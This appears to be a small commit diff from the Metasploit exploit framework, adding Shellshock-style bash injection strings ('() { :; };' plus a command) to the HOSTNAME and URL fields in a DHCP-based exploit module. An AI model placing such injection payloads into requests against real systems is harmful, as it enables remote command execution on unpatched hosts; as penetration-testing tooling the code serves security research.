Add injection to HOSTNAME and URL

bug/bundler_fix
jvazquez-r7 2014-09-26 10:13:24 -05:00
parent a31b4ecad9
commit 54e6763990
1 changed files with 3 additions and 0 deletions

View File

@ -70,6 +70,9 @@ class Metasploit3 < Msf::Exploit::Remote
if hash['DOMAINNAME'].length > 255
raise ArgumentError, 'payload too long'
end
hash['HOSTNAME'] = "() { :; };#{echo}"
hash['URL'] = "() { :; };#{echo}"
start_service(hash)
begin